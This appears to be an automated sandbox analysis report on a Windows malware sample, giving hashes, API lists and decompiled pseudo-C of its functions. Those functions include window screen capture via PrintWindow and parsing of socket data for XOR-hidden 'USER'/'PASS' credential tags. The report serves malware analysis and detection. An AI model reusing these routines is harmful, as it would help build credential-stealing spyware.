0x004198fb
0x00419905
0x0041990f
0x00419919
0x00419923
0x0041992d
0x00419937
0x00419941
0x0041994b
0x00419955
0x0041995f
0x00419969
0x00419973
0x0041997d
0x00419987
0x00419991
0x0041999b
0x004199a5
0x004199af
0x004199b9
0x004199c3
0x004199cd
0x004199d8
0x004199e2
0x004199ec
0x004199f6
0x00419a00
0x00419a0a
0x00419a14
0x00419a1e
0x00419a28
0x00419a32
0x00419a3c
0x00419a41
0x00419a4d
0x00419a4e
0x00419a59

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e2b2a2918b4699f7cc8d2f25a9871d657e74ed4998cf913d8686065b1bbbe110
Instruction ID: 7fd0c0d413c19c5967cfa16bf51bc9a843055eb620c497a5d0c3c2b7666fa073
Opcode Fuzzy Hash: e2b2a2918b4699f7cc8d2f25a9871d657e74ed4998cf913d8686065b1bbbe110
Instruction Fuzzy Hash: D661BEB8A00241EFD3A0CF28EFC0A5077E4B3487543E1417AE918E7731E2B5A996DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00405BBA, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: 8e28d7f3623ebb4924d1157d0fefa6ab95efcb31daae6b8189b4157b9968a788
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: 65E0DF7A3005148BCB41CA15D480943B7B2FBC8330B2286B5C8198B346D938FDC38AE5

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC64, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040BC64(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E0041A6EF(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E0040BB82(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E0040BB82(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E0040BB82(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x423e7c,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E0040BB82(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E0040BB82(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x423e7c, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E0040BB82(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E0040BB82(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

0x0040bc64
0x0040bc73
0x0040bc7a
0x0040bc7d
0x0040bc82
0x0040bc90
0x0040bc92
0x0040bc99
0x0040bc99
0x0040bc9f
0x0040bcad
0x0040bcad
0x0040bcba
0x0040bcbd
0x0040bcc0
0x0040bcc3
0x0040bcc6
0x0040bcd8
0x0040bcf7
0x0040bcfa
0x0040bcff
0x0040bd01
0x0040bd04
0x0040bd0c
0x0040bd10
0x0040bd10
0x0040bd13
0x0040bd15
0x0040bd1d
0x0040bd21
0x0040bd21
0x0040bd1d
0x0040bd27
0x0040bd2a
0x0040bd2d
0x0040bd7b
0x0040bd2f
0x0040bd36
0x0040bd4d
0x0040bd54
0x0040bd56
0x0040bd59
0x0040bd61
0x0040bd65
0x0040bd65
0x0040bd68
0x0040bd6a
0x0040bd72
0x0040bd76
0x0040bd76
0x0040bd72
0x0040bd38
0x0040bd38
0x0040bd38
0x0040bd36
0x0040bd81
0x0040bd93
0x0040bd97
0x00000000
0x00000000
0x0040bda6
0x0040bda8
0x0040bdb0
0x00000000
0x00000000
0x0040bdb6
0x0040bdbd
0x0040bdc3
0x0040bdc8
0x0040bdd6
0x0040bdde
0x0040bf59
0x0040bfba
0x0040bf9b
0x0040bf9f
0x0040bfa6
0x00000000
0x0040bfac
0x0040bfbf
0x0040bfce
0x0040bfce
0x0040bfda
0x0040bfe4
0x0040bfec
0x0040bf8f
0x0040bf96
0x0040bfee
0x0040bfee
0x0040bfee
0x00000000
0x0040bfec
0x0040bf5e
0x0040bf6d
0x0040bf6d
0x0040bf79
0x0040bf89
0x00000000
0x0040bf89
0x0040bde7
0x0040bdf0
0x0040bdf3
0x0040bdfc
0x0040be03
0x0040be10
0x0040be13
0x0040be16
0x0040be26
0x0040be41
0x0040be47
0x0040be56
0x0040be56
0x0040be63
0x0040be73
0x0040be76
0x0040be7b
0x0040be88
0x0040be88
0x0040be96
0x0040be9f
0x0040be9f
0x0040bea9
0x0040bf46
0x0040bf4d
0x00000000
0x0040beaf
0x0040beb2
0x0040bebc
0x0040bebc
0x0040bec0
0x0040bec7
0x0040becd
0x0040bed7
0x0040bed7
0x0040bee4
0x0040bef0
0x0040bef7
0x0040befb
0x0040befe
0x0040bf07
0x0040bf11
0x0040bf11
0x0040bf1e
0x0040bf21
0x0040bf26
0x0040bf33
0x0040bf33
0x0040bf41
0x00000000
0x0040bf41
0x0040beb4
0x0040beba
0x00000000
0x00000000
0x00000000
0x0040beba
0x0040bea9
0x0040bdcb
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bd81
0x0040bcda
0x00000000
0x0040bcda
0x0040bc84
0x00000000

APIs

Part of subcall function 0041A6EF: GetClassNameW.USER32 ref: 0041A70A

GetWindowInfo.USER32 ref: 0040BCD0
SelectObject.GDI32(00000000,?), ref: 0040BF9F
DeleteDC.GDI32(00000000), ref: 0040BFA6
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040BFCE
PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 0040BFE4

Strings

<, xrefs: 0040BCC6

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
String ID: <
API String ID: 3458064076-4251816714
Opcode ID: 9dfeda1e90e3a9bfebfb0f040100ceacd9235d489d95e69d768255c43ed8b11c
Instruction ID: fab35b14d7857cc2a86b72428ebe6a2bff67851e703e3f381308b44792ff810a
Opcode Fuzzy Hash: 9dfeda1e90e3a9bfebfb0f040100ceacd9235d489d95e69d768255c43ed8b11c
Instruction Fuzzy Hash: B6C15C71900249AFDF119FA4DD84EEEBBB9EF04300F04806AF955B72A0D7388A45DF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A756, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 205
filewindowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A756(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v9;
				struct HDC__* _v16;
				char _v20;
				short _v128;
				void* _v138;
				char _v616;
				char _v1126;
				char _v1576;
				void* _t60;
				long _t62;
				void* _t66;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t80;
				struct HDC__* _t82;
				int _t85;
				void* _t87;
				signed char _t90;
				void* _t92;
				void* _t107;
				struct HDC__* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t120;
				void** _t124;

				_t124 = __esi;
				_t120 = __edx;
				E00411A74(_t60, __esi, 0, 0x18c);
				_t62 = TlsAlloc();
				__esi[1] = _t62;
				if(_t62 != 0xffffffff) {
					E00406312(0x84889911,  &_v128, 0);
					_t66 = RegisterWindowMessageW( &_v128);
					__esi[2] = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L1;
					}
					E00406312(0x84889912,  &_v128, 1);
					_t71 = CreateEventW(0x422568, 1, 0,  &_v128);
					__esi[3] = _t71;
					__eflags = _t71;
					if(_t71 == 0) {
						goto L1;
					}
					E00406312(0x18782822,  &_v128, 1);
					_t75 = CreateMutexW(0x422568, 0,  &_v128);
					__esi[5] = _t75;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L1;
					}
					E00406312(0x9878a222,  &_v128, 1);
					_t79 = CreateFileMappingW(0, 0x422568, 4, 0, 0x3d09128,  &_v128);
					 *__esi = _t79;
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					}
					__esi[4] = _t80;
					__esi[6] = _t80 + 0x128;
					_v9 = 0;
					_t82 = GetDC(0);
					_v16 = _t82;
					__eflags = _t82;
					if(_t82 == 0) {
						L22:
						return _v9;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t82, 8);
					_t85 = GetDeviceCaps(_v16, 0xa);
					_t118 = __esi[0xb];
					__esi[0xc] = _t85;
					__eflags = CreateCompatibleBitmap(_v16, __esi[0xb], _t85);
					if(__eflags == 0) {
						_t87 = 0;
						__eflags = 0;
					} else {
						_t24 =  &(_t124[8]); // 0x423e98
						_t87 = E00417F5F(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
					}
					_t124[7] = _t87;
					ReleaseDC(0, _v16);
					__eflags = _t124[7];
					if(_t124[7] != 0) {
						_t119 = _v20;
						_t90 =  *(_v20 + 0xe) >> 3;
						_t124[0xe] = _t90;
						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
						_t124[0xd] = _t92;
						__eflags = _t92 & 0x00000003;
						if((_t92 & 0x00000003) != 0) {
							_t92 = (_t92 & 0xfffffffc) + 4;
							__eflags = _t92;
						}
						_t124[0xd] = _t92;
						E004119C1(_t119);
						__eflags = _a4 - 1;
						_v9 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v9 = 0;
						E004065EC( &_v1576);
						E00406619(_t119,  &_v616);
						_t43 =  &(_t124[0xf]); // 0x423eb4
						E004119FD(_t43, 0x4227a8, 0x10);
						_t124[0x13] = _v138;
						_t47 =  &(_t124[0x14]); // 0x423ec8
						E004119FD(_t47,  &_v1126, 0x102);
						E00406312(0x1898b122,  &_v128, 1);
						_t107 = CreateMutexW(0x422568, 0,  &_v128);
						_t124[0x58] = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							goto L1;
						}
						_t108 = GetDC(0);
						_a4 = _t108;
						__eflags = _t108;
						if(_t108 != 0) {
							_t109 = CreateCompatibleDC(_t108);
							_t124[0x55] = _t109;
							__eflags = _t109;
							if(_t109 != 0) {
								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
								_t124[0x57] = _t111;
								__eflags = _t111;
								if(_t111 != 0) {
									_t112 = SelectObject(_t124[0x55], _t111);
									_t124[0x56] = _t112;
									__eflags = _t112;
									if(_t112 != 0) {
										_v9 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

0x0041a756
0x0041a756
0x0041a76a
0x0041a76f
0x0041a775
0x0041a77b
0x0041a78e
0x0041a797
0x0041a79d
0x0041a7a0
0x0041a7a2
0x00000000
0x00000000
0x0041a7af
0x0041a7c1
0x0041a7c7
0x0041a7ca
0x0041a7cc
0x00000000
0x00000000
0x0041a7d9
0x0041a7e4
0x0041a7ea
0x0041a7ed
0x0041a7ef
0x00000000
0x00000000
0x0041a7fc
0x0041a80f
0x0041a815
0x0041a817
0x0041a819
0x00000000
0x00000000
0x0041a825
0x0041a82b
0x0041a82d
0x00000000
0x00000000
0x0041a833
0x0041a83c
0x0041a83f
0x0041a842
0x0041a848
0x0041a84b
0x0041a84d
0x0041a9b8
0x00000000
0x0041a9b8
0x0041a85c
0x0041a85f
0x0041a869
0x0041a86c
0x0041a86e
0x0041a87c
0x0041a881
0x0041a883
0x0041a89a
0x0041a89a
0x0041a885
0x0041a888
0x0041a893
0x0041a893
0x0041a89f
0x0041a8a3
0x0041a8a9
0x0041a8ac
0x0041a8b2
0x0041a8b9
0x0041a8bd
0x0041a8c3
0x0041a8c7
0x0041a8ca
0x0041a8cc
0x0041a8d1
0x0041a8d1
0x0041a8d1
0x0041a8d5
0x0041a8d8
0x0041a8dd
0x0041a8e1
0x0041a8e5
0x00000000
0x00000000
0x0041a8f1
0x0041a8f4
0x0041a900
0x0041a90c
0x0041a910
0x0041a91b
0x0041a92a
0x0041a92e
0x0041a93e
0x0041a94d
0x0041a953
0x0041a959
0x0041a95b
0x00000000
0x00000000
0x0041a962
0x0041a968
0x0041a96b
0x0041a96d
0x0041a970
0x0041a976
0x0041a97c
0x0041a97e
0x0041a987
0x0041a989
0x0041a98f
0x0041a991
0x0041a99a
0x0041a9a0
0x0041a9a6
0x0041a9a8
0x0041a9aa
0x0041a9aa
0x0041a9a8
0x0041a991
0x0041a9b2
0x0041a9b2
0x0041a96d
0x00000000
0x0041a8ac
0x0041a77d
0x00000000

APIs

TlsAlloc.KERNEL32(00423E78,00000000,0000018C,00000000,00000000), ref: 0041A76F
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0041A797
CreateEventW.KERNEL32(00422568,00000001,00000000,?,84889912,?,00000001), ref: 0041A7C1
CreateMutexW.KERNEL32(00422568,00000000,?,18782822,?,00000001), ref: 0041A7E4
CreateFileMappingW.KERNEL32(00000000,00422568,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0041A80F
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0041A825
GetDC.USER32(00000000), ref: 0041A842
GetDeviceCaps.GDI32(00000000,00000008), ref: 0041A862
GetDeviceCaps.GDI32(?,0000000A), ref: 0041A86C
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0041A87F

Strings

h%B, xrefs: 0041A7BB

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
String ID: h%B
API String ID: 3765073151-3383014353
Opcode ID: 13ef53d0e043e59d6c065c42b1b45e5cf2978eb8131bc60b31dc1b7fe6975350
Instruction ID: 105e1555d395346a070a0585ca0fc60117ec0de6a6961ac548d13e7e22b2645c
Opcode Fuzzy Hash: 13ef53d0e043e59d6c065c42b1b45e5cf2978eb8131bc60b31dc1b7fe6975350
Instruction Fuzzy Hash: AF7150B1900644AFDB209FB0CD89EEBB7FCEB08304F10482EF952E6251D67999988F15

Uniqueness

Uniqueness Score: -1.00%

Function 00409FC5, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409FC5(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t35;
				void* _t40;
				char* _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				signed int* _t71;
				intOrPtr _t73;
				signed int _t75;
				signed char _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t85;
				void* _t87;
				char* _t92;
				void* _t93;
				intOrPtr* _t94;

				_t80 = __edx;
				_t87 = __eax;
				_t71 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t35 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t87 - 1;
						if(_t87 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x422a50);
							_t83 = E00409EBD(_a4);
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags =  *((intOrPtr*)(_t83 + 4));
								if( *((intOrPtr*)(_t83 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t83 + 8));
									if( *((intOrPtr*)(_t83 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t87 - 3;
										if(_t87 < 3) {
											L33:
											__eflags = _t87 - 4;
											if(_t87 >= 4) {
												_t75 =  *_t71 ^ 0x03030303;
												__eflags = _t75 - 0x46535a57;
												if(_t75 == 0x46535a57) {
													goto L37;
												} else {
													__eflags = _t75 - 0x57424645;
													if(_t75 == 0x57424645) {
														goto L37;
													} else {
														__eflags = _t75 - 0x55504253;
														if(_t75 != 0x55504253) {
															__eflags = _t75 - 0x57425750;
															if(_t75 == 0x57425750) {
																L40:
																_t76 = 0x65;
																_push(0x15);
																goto L41;
															} else {
																__eflags = _t75 - 0x57504a4f;
																if(_t75 == 0x57504a4f) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t58 =  *_t71;
											__eflags = _t58 - 0x43;
											if(_t58 == 0x43) {
												L31:
												__eflags = _t71[0] - 0x57;
												if(_t71[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t71[0] - 0x44;
													if(_t71[0] == 0x44) {
														L37:
														_t76 = 0x64;
														_push(0x14);
														L41:
														_pop(_t40);
														E00419DD3(_t40,  &_v696);
														_t43 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t43,  &_v700);
														__eflags = _t43;
														if(_t43 == 0) {
															_t78 =  &_v664;
															_t44 = E00414E6B( &_v664);
															__eflags = _t44;
															if(_t44 == 0) {
																__eflags = _t76 - 0x65;
																if(_t76 == 0x65) {
																	L46:
																	E00414E22( &_v664, _t78,  &_v536);
																	_t47 = 0x13;
																	E00419DD3(_t47,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t83 + 8)));
																	_push( *((intOrPtr*)(_t83 + 4)));
																	E0040BA61(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t76 - 0x64;
																	if(_t76 == 0x64) {
																		_t92 =  &_v696;
																		_t54 = 0x16;
																		E00419DD3(_t54, _t92);
																		_push( *((intOrPtr*)(_t83 + 4)));
																		_t80 = _t80 | 0xffffffff;
																		_t56 = 9;
																		_t78 = _t92;
																		_t57 = E004125D1(_t56, _t92, _t80);
																		__eflags = _t57;
																		if(_t57 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E00409F5C(_t83);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t58 - 0x50;
												if(_t58 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t73 = 0;
							goto L23;
						}
					} else {
						_t60 =  *__ecx ^ 0x03030303;
						if(_t60 == 0x51465056 || _t60 == 0x50504253) {
							if(_t71[1] != 0x20) {
								goto L24;
							} else {
								_t61 = 0;
								_t93 = _t87 + 0xfffffffb;
								_t84 =  &(_t71[1]);
								if(_t93 == 0) {
									goto L51;
								} else {
									while(1) {
										_t79 =  *((intOrPtr*)(_t61 + _t84));
										if(_t79 == 0xd || _t79 == 0xa) {
											break;
										}
										if(_t79 < 0x20) {
											goto L51;
										} else {
											_t61 = _t61 + 1;
											if(_t61 < _t93) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t61 == 0 || _t61 == _t93) {
										goto L51;
									} else {
										_t85 = E00411C01(_t61, 0xfde9, _t84);
										if(_t85 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x422a50);
											_t94 = E00409EBD(_a4);
											if(_t94 != 0) {
												L18:
												__eflags =  *_t71 - 0x55;
												_v701 = 1;
												if( *_t71 != 0x55) {
													E004119C1( *((intOrPtr*)(_t94 + 8)));
													 *((intOrPtr*)(_t94 + 8)) = _t85;
												} else {
													E00409F5C(_t94, 1);
													 *((intOrPtr*)(_t94 + 4)) = _t85;
												}
												 *_t94 = _a4;
											} else {
												_t94 = E00409EF6(_a4);
												if(_t94 != 0) {
													goto L18;
												} else {
													E004119C1(_t85);
												}
											}
											_t73 = _v701;
											L23:
											LeaveCriticalSection(0x422a50);
											_t35 = _t73;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t35;
			}

0x00409fc5
0x00409fd8
0x00409fda
0x00409fdc
0x0040a233
0x0040a233
0x0040a233
0x00409ff6
0x00409ff9
0x0040a0e2
0x0040a0e2
0x0040a0e5
0x00000000
0x0040a0eb
0x0040a0f0
0x0040a0fe
0x0040a102
0x0040a104
0x0040a10a
0x0040a10d
0x0040a224
0x0040a224
0x00000000
0x0040a113
0x0040a113
0x0040a116
0x00000000
0x0040a11c
0x0040a11c
0x0040a11f
0x0040a137
0x0040a137
0x0040a13a
0x0040a142
0x0040a148
0x0040a14e
0x00000000
0x0040a150
0x0040a150
0x0040a156
0x00000000
0x0040a158
0x0040a158
0x0040a15e
0x0040a166
0x0040a16c
0x0040a17a
0x0040a17a
0x0040a17c
0x00000000
0x0040a16e
0x0040a16e
0x0040a174
0x00000000
0x00000000
0x0040a174
0x00000000
0x00000000
0x00000000
0x0040a15e
0x0040a156
0x0040a14e
0x0040a121
0x0040a121
0x0040a123
0x0040a125
0x0040a12b
0x0040a12b
0x0040a12f
0x00000000
0x0040a131
0x0040a131
0x0040a135
0x0040a160
0x0040a160
0x0040a162
0x0040a17e
0x0040a182
0x0040a183
0x0040a18d
0x0040a195
0x0040a19d
0x0040a1a3
0x0040a1a5
0x0040a1a7
0x0040a1ab
0x0040a1b0
0x0040a1b2
0x0040a1b4
0x0040a1b7
0x0040a1de
0x0040a1e9
0x0040a1f4
0x0040a1f5
0x0040a201
0x0040a202
0x0040a209
0x0040a218
0x0040a1b9
0x0040a1b9
0x0040a1bc
0x0040a1c0
0x0040a1c4
0x0040a1c5
0x0040a1ca
0x0040a1cd
0x0040a1d2
0x0040a1d3
0x0040a1d5
0x0040a1da
0x0040a1dc
0x00000000
0x00000000
0x0040a1dc
0x0040a1bc
0x0040a1b7
0x0040a1b2
0x0040a220
0x0040a225
0x0040a227
0x00000000
0x00000000
0x00000000
0x0040a135
0x0040a127
0x0040a127
0x0040a129
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a129
0x0040a125
0x0040a11f
0x0040a116
0x0040a10d
0x0040a22c
0x00000000
0x0040a22c
0x00409fff
0x0040a001
0x0040a00b
0x0040a01c
0x00000000
0x0040a022
0x0040a022
0x0040a024
0x0040a027
0x0040a02a
0x00000000
0x0040a030
0x0040a030
0x0040a030
0x0040a036
0x00000000
0x00000000
0x0040a040
0x00000000
0x0040a046
0x0040a046
0x0040a049
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a049
0x00000000
0x0040a040
0x0040a04d
0x00000000
0x0040a05b
0x0040a066
0x0040a06a
0x00000000
0x0040a070
0x0040a075
0x0040a07a
0x0040a088
0x0040a08c
0x0040a0a4
0x0040a0a4
0x0040a0a7
0x0040a0ac
0x0040a0bf
0x0040a0c4
0x0040a0ae
0x0040a0b2
0x0040a0b7
0x0040a0b7
0x0040a0ca
0x0040a08e
0x0040a096
0x0040a09a
0x00000000
0x0040a09c
0x0040a09d
0x0040a09d
0x0040a09a
0x0040a0cc
0x0040a0d0
0x0040a0d5
0x0040a0db
0x0040a0db
0x0040a06a
0x0040a04d
0x0040a02a
0x00000000
0x00000000
0x00000000
0x0040a00b
0x00409ff9
0x0040a235
0x0040a23b

APIs

EnterCriticalSection.KERNEL32(00422A50,0000FDE9,?), ref: 0040A07A
LeaveCriticalSection.KERNEL32(00422A50,?,000000FF), ref: 0040A0D5
EnterCriticalSection.KERNEL32(00422A50), ref: 0040A0F0
getpeername.WS2_32 ref: 0040A19D

Strings

OJPW, xrefs: 0040A16E
U, xrefs: 0040A0A4
W, xrefs: 0040A12B
SBPP, xrefs: 0040A00D
WZSF, xrefs: 0040A148
EFBW, xrefs: 0040A150
SBPU, xrefs: 0040A158
VPFQ, xrefs: 0040A006
D, xrefs: 0040A131
, xrefs: 0040A018
PWBW, xrefs: 0040A166

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Leavegetpeername
